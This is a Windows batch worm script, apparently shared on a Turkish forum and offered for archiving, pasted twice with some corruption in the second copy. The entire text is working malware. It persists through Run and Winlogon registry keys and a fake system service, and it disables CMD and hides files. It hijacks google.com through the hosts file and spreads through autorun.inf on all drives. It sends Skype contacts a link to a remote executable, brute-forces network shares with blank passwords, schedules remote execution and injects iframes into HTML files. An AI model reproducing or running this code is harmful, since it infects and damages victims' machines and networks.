@echo off & break off
:loop
if not exist "%userprofile%\tmp" mkdir "%userprofile%\tmp"
copy %0 "%userprofile%\tmp\Qsoft.bat"
echo msgbox("Visit www.google.com.",16,"VISIT IT!") > "%userprofile%\tmp\tmp.vbs"
echo set shell = CreateObject("Wscript.Shell") >> "%userprofile%\tmp\stsyk.vbs"
echo shell.run "Qsoft.bat", 0 >> "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp"
attrib +h +s +r "%userprofile%\tmp\Qsoft.bat"
copy %0 %windir%\system32\taskmgr.bat
attrib +h +s +r %windir%\system32\taskmgr.bat
reg add HKLM\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "rundll-drivers" /d "%userprofile%\tmp\tmp.vbs" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t "REG_DWORD" /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFind" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v SuperHidden /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
echo "HKLM\SYSTEM\CurrentControlSet\Services\Windows network Service" >%windir%\system32\n32.reg
echo "Type"=dword:00000110 >>%windir%\system32\n32.reg
echo "Start"=dword:00000002 >>%windir%\system32\n32.reg
echo "ErrorControl"=dword:00000000 >>%windir%\system32\n32.reg
echo "ImagePath"="%userprofile%\tmp\Qsoft.bat" >>%windir%\system32\n32.reg
echo "DisplayName"="Windows Network Service" >>%windir%\system32\n32.reg
echo "ObjectName"="LocalSystem" >>%windir%\system32\n32.reg
echo "Description"="Windows Network Service" >>%windir%\system32\n32.reg
echo HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WINDOWS_REG_SERVICE\
0000\Control >>%windir%\system32\n32.reg
echo "*NewlyCreated*"=dword:00000000 >>%windir%\system32\n32.reg
echo "ActiveService"="Windows Network Service" >>%windir%\system32\n32.reg
REGEDIT /S %windir%\system32\n32.reg
echo [InternetShortcut] > "%userprofile%\Desktop\0110005.url"
echo URL=http://www.google.com >> "%userprofile%\Desktop\0110005.url"
echo IDList= >> "%userprofile%\Desktop\0110005.url"
echo [{000214A0-0000-0000-C000-000000000046}] >> "%userprofile%\Desktop\0110005.url"
echo Prop3=19,2 >> "%userprofile%\Desktop\0110005.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\Desktop\%random%_Visit!!.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\favorites"
if not exist "%programfiles%\Qsoft" mkdir "%programfiles%\Qsoft"
copy "%userprofile%\Desktop\0110005.url" "%programfiles%\Qsoft"
echo 216.146.36.97 google.com >>"%windir%\system32\drivers\etc\hosts"
echo 216.146.36.97 www.google.com >>"%windir%\system32\drivers\etc\hosts"
copy %0 %windir%\system32\drivers\Qsoft.bat
copy "%userprofile%\tmp\stsyk.vbs" %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\Qsoft.bat
CACLS %windir%\system32\drivers\syk.vbs /E /P %username%:R
CACLS %windir%\system32\drivers\Qsoft.bat /E /P %username%:R
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,%windir%\system32\drivers\syk.vbs" /f
if exist "%userprofile%\desktop\desktop.ini" copy "%userprofile%\desktop\desktop.ini" %windir%\system32\drivers
for %%g in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%g:\ (
copy %0 %%g:\bin.bat
echo [autorun] >%%g:\autorun.inf
echo open=bin.bat >>%%g:\autorun.inf
echo shellexecute=bin.bat >>%%g:\autorun.inf
echo shell\Explore\command=bin.bat >>%%g:\autorun.inf
echo shell\Open\command=bin.bat >>%%g:\autorun.inf
echo shell=Explore >>%%g:\autorun.inf
attrib +h +s +r %%g:\autorun.inf
attrib +h +s +r %%g:\bin.bat
)
)
echo on error resume next >>%windir%\skype.vbs
echo set Fruxr = WScript.CreateObject("Skype4COM.Skype", "Skype_") >>%windir%\skype.vbs
echo Fruxr.Client.Start() >>%windir%\skype.vbs
echo Fruxr.Attach() >>%windir%\skype.vbs
echo For Each KZN In Fruxr.Friends >>%windir%\skype.vbs
echo Fruxr.SendMessage KZN.handle,"http://h1.ripway.com/windowsgame/svchost.exe
" >>%windir%\skype.vbs
echo next >>%windir%\skype.vbs
start %windir%\skype.vbs
ping localhost -n 15
tskill skype
taskkill /IM /F skype
del %windir%\skype.vbs
for /f "tokens=1 delims= " %%f in ('net view ^| find " " ') do echo %%f >>%windir%\teest.txt
for /f %%g in (%windir%\teest.txt) do (
net use %%g /user:admin ""
net use %%g /user:administrator ""
net use %%g /user:%username% ""
net use %%g /user:%username% ""
net use %%g\IPC$ /user:administrator ""
net use %%g\admin$ /user:administrator ""
net use %%g\print$ /user:administrator ""
net use %%g\c$ /user:administrator ""
net use %%g\IPC$ /user:adm ""
net use %%g\admin$ /user:admin ""
net use %%g\print$ /user:admin ""
net use %%g\c$ /user:admin ""
copy %0 %%g\IPC$\funny.bat
copy %0 %%g\C$\funny.bat
copy %0 %%g\admin$\funny.bat
copy %0 %%g\print$\funny.bat
for /f "tokens=1 delims= " %%a in ('net view %%g ^| find " " ') do echo %%a >>%windir%\input123.blp
for /f %%t in (%windir%\input123.blp) do (
copy %0 %%g\%%t\readme.bat
copy %0 %%g\%%t\%%t.bat
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\Admin$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\IPC$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\%%t\readme.bat
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\C$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\print$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\admin$\funny.bat"
)
)
dir /s /ad /b * >%windir%\tmp.log
for /f "tokens=1-5 delims=." %%I in (%windir%\tmp.log) do (
for %%t in (%%I\*.html) do (
echo ^<iframe src="http://google.com"^> >>%%t
)
for %%b in (%%I\*.htm) do (
echo ^<iframe src="http://google.com"^> >>%%b
)
for %%c in (%%I\*.hta) do (
echo ^<iframe src="http://google.com"^> >>%%c
)
del %windir%\tmp.log
set /a ranz=%random%%%45+1
ping localhost -n %ranz%
start http://google.com
goto loop
echo :%username%%random% >>%0
+Bence arşive ekleyin bi daha rastlamayabilir...
++BİR TEŞEKKÜRÜ ÇOOK GÖRMEYİN...++
:loop
if not exist "%userprofile%\tmp" mkdir "%userprofile%\tmp"
copy %0 "%userprofile%\tmp\Qsoft.bat"
echo msgbox("Visit www.google.com.",16,"VISIT IT!") > "%userprofile%\tmp\tmp.vbs"
echo set shell = CreateObject("Wscript.Shell") >> "%userprofile%\tmp\stsyk.vbs"
echo shell.run "Qsoft.bat", 0 >> "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp"
attrib +h +s +r "%userprofile%\tmp\Qsoft.bat"
copy %0 %windir%\system32\taskmgr.bat
attrib +h +s +r %windir%\system32\taskmgr.bat
reg add HKLM\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "rundll-drivers" /d "%userprofile%\tmp\tmp.vbs" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t "REG_DWORD" /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFind" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v SuperHidden /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
echo "HKLM\SYSTEM\CurrentControlSet\Services\Windows network Service" >%windir%\system32\n32.reg
echo "Type"=dword:00000110 >>%windir%\system32\n32.reg
echo "Start"=dword:00000002 >>%windir%\system32\n32.reg
echo "ErrorControl"=dword:00000000 >>%windir%\system32\n32.reg
echo "ImagePath"="%userprofile%\tmp\Qsoft.bat" >>%windir%\system32\n32.reg
echo "DisplayName"="Windows Network Service" >>%windir%\system32\n32.reg
echo "ObjectName"="LocalSystem" >>%windir%\system32\n32.reg
echo "Description"="Windows Network Service" >>%windir%\system32\n32.reg
echo HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WINDOWS_REG_SERVICE\
0000\Control >>%windir%\system32\n32.reg
echo "*NewlyCreated*"=dword:00000000 >>%windir%\system32\n32.reg
echo "ActiveService"="Windows Network Service" >>%windir%\system32\n32.reg
REGEDIT /S %windir%\system32\n32.reg
echo [InternetShortcut] > "%userprofile%\Desktop\0110005.url"
echo URL=http://www.google.com >> "%userprofile%\Desktop\0110005.url"
echo IDList= >> "%userprofile%\Desktop\0110005.url"
echo [{000214A0-0000-0000-C000-000000000046}] >> "%userprofile%\Desktop\0110005.url"
echo Prop3=19,2 >> "%userprofile%\Desktop\0110005.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\Desktop\%random%_Visit!!.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\favorites"
if not exist "%programfiles%\Qsoft" mkdir "%programfiles%\Qsoft"
copy "%userprofile%\Desktop\0110005.url" "%programfiles%\Qsoft"
echo 216.146.36.97 google.com >>"%windir%\system32\drivers\etc\hosts"
echo 216.146.36.97 www.google.com >>"%windir%\system32\drivers\etc\hosts"
copy %0 %windir%\system32\drivers\Qsoft.bat
copy "%userprofile%\tmp\stsyk.vbs" %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\Qsoft.bat
CACLS %windir%\system32\drivers\syk.vbs /E /P %username%:R
CACLS %windir%\system32\drivers\Qsoft.bat /E /P %username%:R
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,%windir%\system32\drivers\syk.vbs" /f
if exist "%userprofile%\desktop\desktop.ini" copy "%userprofile%\desktop\desktop.ini" %windir%\system32\drivers
for %%g in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%g:\ (
copy %0 %%g:\bin.bat
echo [autorun] >%%g:\autorun.inf
echo open=bin.bat >>%%g:\autorun.inf
echo shellexecute=bin.bat >>%%g:\autorun.inf
echo shell\Explore\command=bin.bat >>%%g:\autorun.inf
echo shell\Open\command=bin.bat >>%%g:\autorun.inf
echo shell=Explore >>%%g:\autorun.inf
attrib +h +s +r %%g:\autorun.inf
attrib +h +s +r %%g:\bin.bat
)
)
echo on error resume next >>%windir%\skype.vbs
echo set Fruxr = WScript.CreateObject("Skype4COM.Skype", "Skype_") >>%windir%\skype.vbs
echo Fruxr.Client.Start() >>%windir%\skype.vbs
echo Fruxr.Attach() >>%windir%\skype.vbs
echo For Each KZN In Fruxr.Friends >>%windir%\skype.vbs
echo Fruxr.SendMessage KZN.handle,"http://h1.ripway.com/windowsgame/svchost.exe
" >>%windir%\skype.vbsecho next >>%windir%\skype.vbs
start %windir%\skype.vbs
ping localhost -n 15
tskill skype
taskkill /IM /F skype
del %windir%\skype.vbs
for /f "tokens=1 delims= " %%f in ('net view ^| find " " ') do echo %%f >>%windir%\teest.txt
for /f %%g in (%windir%\teest.txt) do (
net use %%g /user:admin ""
net use %%g /user:administrator ""
net use %%g /user:%username% ""
net use %%g /user:%username% ""
net use %%g\IPC$ /user:administrator ""
net use %%g\admin$ /user:administrator ""
net use %%g\print$ /user:administrator ""
net use %%g\c$ /user:administrator ""
net use %%g\IPC$ /user:adm ""
net use %%g\admin$ /user:admin ""
net use %%g\print$ /user:admin ""
net use %%g\c$ /user:admin ""
copy %0 %%g\IPC$\funny.bat
copy %0 %%g\C$\funny.bat
copy %0 %%g\admin$\funny.bat
copy %0 %%g\print$\funny.bat
for /f "tokens=1 delims= " %%a in ('net view %%g ^| find " " ') do echo %%a >>%windir%\input123.blp
for /f %%t in (%windir%\input123.blp) do (
copy %0 %%g\%%t\readme.bat
copy %0 %%g\%%t\%%t.bat
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\Admin$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\IPC$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\%%t\readme.bat
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\C$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\print$\funny.bat"
AT \\%%g 21:00 /EVERY:S CMD /C "%%g\admin$\funny.bat"
)
)
dir /s /ad /b * >%windir%\tmp.log
for /f "tokens=1-5 delims=." %%I in (%windir%\tmp.log) do (
for %%t in (%%I\*.html) do (
echo ^<iframe src="http://google.com"^> >>%%t
)
for %%b in (%%I\*.htm) do (
echo ^<iframe src="http://google.com"^> >>%%b
)
for %%c in (%%I\*.hta) do (
echo ^<iframe src="http://google.com"^> >>%%c
)
del %windir%\tmp.log
set /a ranz=%random%%%45+1
ping localhost -n %ranz%
start http://google.com
goto loop
echo :%username%%random% >>%0
+Bence arşive ekleyin bi daha rastlamayabilir...
++BİR TEŞEKKÜRÜ ÇOOK GÖRMEYİN...++
